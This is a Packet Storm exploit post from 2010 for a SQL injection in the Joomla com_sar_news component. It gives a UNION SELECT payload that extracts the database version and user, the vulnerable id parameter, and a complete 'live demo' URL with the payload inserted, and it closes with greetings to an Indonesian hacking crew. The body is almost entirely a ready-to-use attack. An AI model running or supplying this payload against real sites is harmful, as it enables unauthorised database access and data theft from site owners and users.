Joomla Sar News SQL Injection

2010-06-02T00:00:00
ID PACKETSTORM:90191
Type packetstorm
Reporter LyNx
Modified 2010-06-02T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Joomla com_sar_news SQL Injection vulnerability  
# Date: 02 juni 2010  
# Author: LyNx (syntax3rror@ymail.com)  
# Platform / Tested on: Windows XP 2  
# category: webapps/0day  
# Code :  
  
==== SQLI EXPLOIT ====  
/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*  
  
==== VULN IN HERE ====  
  
http://localhost/joomla/index.php?option=com_sar_news&id=80[c0de]&sort_by=ordering  
  
  
==== LIVE DEMO ====  
  
http://localhost/joomla/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering  
  
[x]-------------------------------------------------------------------  
Thanks To :  
system_rt0, bobyhikaru, kamtiEz, r3m1ck, otong, bumble_be, anharku,  
virgi, ranggamaggic, shadowsmaker  
suddent_death, pl4nkt0n, pokeng, demnas, Xr0b0t, all crew indonesia  
hacker and all outsider...  
  
[x]-------------------------------------------------------------------  
[x] www.indonesianhacker.or.id  
[x] kuat kita bersinar  
[x]-------------------------------------------------------------------  
  
  
  
`